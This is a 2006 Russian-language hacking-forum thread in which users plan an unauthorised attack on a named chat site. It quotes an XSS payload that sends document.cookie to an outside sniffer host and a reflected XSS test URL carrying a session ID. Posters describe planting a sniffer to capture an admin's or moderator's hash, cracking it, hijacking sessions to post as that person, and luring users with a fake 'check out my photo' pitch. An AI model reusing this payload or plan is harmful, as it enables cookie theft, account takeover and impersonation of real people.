ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Чаты
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #21  
Старый 09.05.2006, 18:03
Аватар для ruh
ruh
Новичок
Регистрация: 08.05.2006
Сообщений: 19
Провел на форуме:
14566

Репутация: 1
По умолчанию

Цитата:
Сообщение от sL(IP)--!(P.i.N.)  
т.е. можно вот эту ссылку
<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
вставить в строку куда надо вводить адрес фотки, а место s.jpg написать реальный адрес фотки и звать всех заценить мою фотку

что делать с
http://chat.scn.ru/index.php?session...403f1a4794296a &go=<script>alert('XSS')</script>
 
Ответить с цитированием

  #22  
Старый 09.05.2006, 18:07
Аватар для ruh
ruh
Новичок
Регистрация: 08.05.2006
Сообщений: 19
Провел на форуме:
14566

Репутация: 1
По умолчанию

Цитата:
Сообщение от Антошка2003  
нет ещё. сам сижу обновляю сниффер каждые 10 минут.
куда ты вводил адрес снифера
чет я сним совсем запутался
 
Ответить с цитированием

  #23  
Старый 09.05.2006, 18:09
Аватар для ruh
ruh
Новичок
Регистрация: 08.05.2006
Сообщений: 19
Провел на форуме:
14566

Репутация: 1
По умолчанию

если снифер выдает хэши => можно писать от друголи лица, проверьте это в этом чате
 
Ответить с цитированием

  #24  
Старый 09.05.2006, 18:11
Аватар для Антошка2003
Антошка2003
Постоянный
Регистрация: 03.04.2005
Сообщений: 610
Провел на форуме:
3238231

Репутация: 165


По умолчанию

адресс сниффера я вводил в форум. теперь сижу и жду когда либо этот модер, либо админ откроет сообщение и тогда мне придёт его хэш.
если расшифруем хэш, то получим пароль, авторизировавшись логином владельца хэша, мы с можем писать от его лица.

Последний раз редактировалось Антошка2003; 09.05.2006 в 18:13..
 
Ответить с цитированием

  #25  
Старый 09.05.2006, 18:25
Аватар для ruh
ruh
Новичок
Регистрация: 08.05.2006
Сообщений: 19
Провел на форуме:
14566

Репутация: 1
По умолчанию

Цитата:
Сообщение от Антошка2003  
адресс сниффера я вводил в форум. теперь сижу и жду когда либо этот модер, либо админ откроет сообщение и тогда мне придёт его хэш.
если расшифруем хэш, то получим пароль, авторизировавшись логином владельца хэша, мы с можем писать от его лица.
Цитата:
Сообщение от Антошка2003  
адресс сниффера я вводил в форум. теперь сижу и жду когда либо этот модер, либо админ откроет сообщение и тогда мне придёт его хэш.
если расшифруем хэш, то получим пароль, авторизировавшись логином владельца хэша, мы с можем писать от его лица.
постой куда именно и как ты вводил сниф в форуме и куда и как его вводить в чате из статьи я этого не понял

а нельзя просто скопировать форму отправки сообщений и свой хэш заменить на его, и отправлять сообщения неавторизовавшись

может просто сказать в чате что в форуме замутил клевую тему (якобы зацените)
 
Ответить с цитированием

  #26  
Старый 09.05.2006, 18:36
Аватар для .Slip
.Slip
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме:
21768337

Репутация: 3486


По умолчанию

Антошка2003, если не в лом, проверь алерт.. у меня некоторые подозрения насчёт него..
_http://chat.scn.ru/index.php?session=366b076ea4992e9fb9403f1a4794296a &go=<script>alert('XSS')</script>
Цитата:
Он там не бавыет, но раз в пол года может и заглянет.
Долго хэши ждать прийдётся)
 
Ответить с цитированием

  #27  
Старый 09.05.2006, 18:36
Аватар для Антошка2003
Антошка2003
Постоянный
Регистрация: 03.04.2005
Сообщений: 610
Провел на форуме:
3238231

Репутация: 165


По умолчанию

как вставлять в фрум читай здесь - http://www.forum.antichat.ru/thread12610.html
в чате на каждый вход даёться разная сессия, если авторизироваться его сессией, то может что то и выйдет. как сессию перехватывать смотри этот раздел, была тема о взломе вуду чатов.
попробуй скажи что замутили клёвую тему.

я попозже попробую с алертами, сейчас не могу пока что. но так кажется что он ничего не даст, но нужно посмотреть, может как и можно будет применить.

Последний раз редактировалось Антошка2003; 09.05.2006 в 18:39..
 
Ответить с цитированием

  #28  
Старый 09.05.2006, 18:47
Аватар для ruh
ruh
Новичок
Регистрация: 08.05.2006
Сообщений: 19
Провел на форуме:
14566

Репутация: 1
По умолчанию

[QUOTE=sL(IP)--!(P.i.N.)

Долго хэши ждать прийдётся)[/QUOTE]

я писал про чат в форуме я его не видел
Rayden всем заправляет, он в форуме часть бывает
 
Ответить с цитированием

  #29  
Старый 09.05.2006, 18:49
Аватар для .Slip
.Slip
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме:
21768337

Репутация: 3486


По умолчанию

ruh, ясн..
Оффтопик:
Rayden отключил меня на неделю, причина: наш чат не ломается
лол)
 
Ответить с цитированием

  #30  
Старый 09.05.2006, 18:49
Аватар для ruh
ruh
Новичок
Регистрация: 08.05.2006
Сообщений: 19
Провел на форуме:
14566

Репутация: 1
По умолчанию

опечатка:
часто бывает
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Проверьте пожалуйста на уязвимость чат www.bazar.co.ua pain_zl0 Чаты 10 19.06.2006 01:10
Проверьте чат на уязвимость... LavInaL Чаты 31 15.05.2006 23:46
Проверьте чат на уязвимости (chat.berdyansk.net) frestker Чаты 13 29.04.2006 14:58
Прошу проверить на уязвимость чат (poligon-chat.net.ru) Nachtgrauen Чаты 2 15.03.2006 21:08



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ